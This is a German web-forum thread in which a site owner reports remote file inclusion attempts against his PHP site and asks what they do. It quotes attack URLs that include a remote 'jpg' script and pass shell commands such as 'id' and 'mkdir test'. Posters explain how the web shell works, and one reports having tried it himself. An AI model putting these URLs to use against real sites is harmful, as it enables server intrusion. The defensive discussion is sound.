![]() |
Will mich da einer Hacken?
Ich hab mir ein kleines Extra in mein PHP Script geschrieben das mich per Mail informiert wenn auf einer meiner Sites ins leere führt. In der Mail steht dann auf welcher Site der Link ist und wohin er füren sollte.
Jetzt hab ich ne Mail bekommen: http ://ww w.meineSeite.de/index.php?page=http://nichtMeineSeite.org/lila.jpg Ich hab mir jetzt mal die Seite http://nichtMeineSeite.org/lila.jpg angeschaut. Das hier hab ich gefunden: :mad: PHP-Code:
|
Das selbe Phänomen hab ich bei meiner Seite auch schon öfters bemerkt.
Es handelt sich dann um w w w.meineseite.com/ref.php?n=http://www.aace.com/2002/photos/TNImage/tn_DSC00398.JPG.jpg?&cmd=id wobei ref.php normal zahlen von 1-100 enthält z.B. ref.php?n=45 aber nie eine url... Vielleicht hilft das wem zum Aufschlüsseln. Grüße, Peter |
Bei mir sehen die Links normalterweise so aus:
http ://ww w.meineSeite.de/index.php?page=SeiteABC wobei SeiteABC nicht der Name einer Datei ist sondern ein Index eines Arrays ;) . Ich hab mir mal die angebliche *.jpg aus deinem Link angesehen und die schaut genauso aus wie bei meinem Besucher. Nur wüsste ich gerne was da genau passiert. Es handelt sich um die Site eines Kunden und die würde ich gerne gegen solche Freaks schützen. Ich glaub nicht das er etwas erreicht hat, aber man kann ja nie wissen :( |
Das sind (wahrscheinlich) Noobs, die versuchen deinen Server zu hacken und zwar mit dieser Möglichkeit (der Fehler könnte jedem passieren):
PHP-Code:
|
Zitat:
|
Mir ist aber noch immer nicht ganz klar was das script eigentlich anstellt :confused:
|
Man kann sich über weitere Parameter in der Shell bewegen und beliebige Programme ausführen - die Ausgabe wird zwischengespeichert und dann im Browser ausgegeben. Steht da doch sogar drin :) -> "To Execute Command ..."
Gruss Jan |
wird auch hier ganz gut beschrieben:
http://groups.google.com/groups?hl=d...D%26ie%3DUTF-8 p.s. da findest sogar genau das script wieder -> kiddy-contest :) $cmd wär dann in dem fall mit irgendwelchen commands zum füllen gewesen (z.b. ls, ll usw) dieser output wird dann im cmdtemp - file zwischengespeichert, ausgegeben (cat) und dann spuren verwischt (rm) der rest läuft dann so, wie jan beschrieben hat. Viel dürfte dem Angreifer das nicht gebracht haben, da ich - soweit ich aus dem Code ersehen kann - solche relevante dinge wie $cmd nicht mitübergeben werden/wurden. |
Habs grad bei mir mit ls ausprobiert.
Das funktioniert super. :) |
:eek: Da geht noch einiges mehr... Verzeichnisse schreiben, wechseln & löschen... man muß sich kurz an das handling gewöhnen aber dann gehts wie in der linux shell, und das beste - es geht mit dem script meines Angreifers, von seinem Server aus :p
zum glück geht es nicht auf meiner site :D |
Zitat:
|
Den übergibst du ja auch dynamisch... wär ja auch blöd wenn du für jeden befehl das script neu speichen müßtest caipi
http ://ww w.meineSeite.de/index.php?age=http://nichtMeineSeite.org/lila.jpg&cms=mkdir test mein besucher versuchte es heute schon zum 4 mal. Ich hab das script jetzt so umgeschrieben das es ihn beim nächsten mal begrüßt und ihm seine IP ausgibt, mit dem kleinen hinweis dass es jetzt doch einmal zu oft war :D |
Gute Idee.
Ich hab bei mir jetzt auch sowas eingebaut. ;) |
Sicherlich eine Sicherheitslücke, die aber schnell geschlossen werden kann.
Aber zum erstellen von Verzeichnissen, löschen, verschieben, usw. Da sehe ich doch meine Probleme. Wer den Apache als root laufen lässt muss sich nicht wundern, das sein System gehackt wird. Als www-data kann er auf einem logisch geführtem System eigentlich nicht viel anrichten. Es mag zur Informationsbeschaffung und zum Aufsuchen von offenen Port usw nutzen, aber das war es dann schon. |
Jetzt läuft mein Script schon seit einigen Tagen uns speichert fleißig die IP nummern der Penner die versuchen mich zu hacken in einer Datenbank.
Es ist schon erschreckend was im netz so alles los ist :( . Alleine heute (stand 21:45 Uhr) haben es vier verschiedene Angreifer versucht. Was kann man da machen :confused:, ich hab ihre IP nummern und hab auch noch ein Cookie auf ihrem Rechner hinterlassen. Den Versuch kann ich also beweisen. |
| Alle Zeitangaben in WEZ +2. Es ist jetzt 18:46 Uhr. |
Powered by vBulletin® Version 3.7.1 (Deutsch)
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0 ©2008, Crawlability, Inc.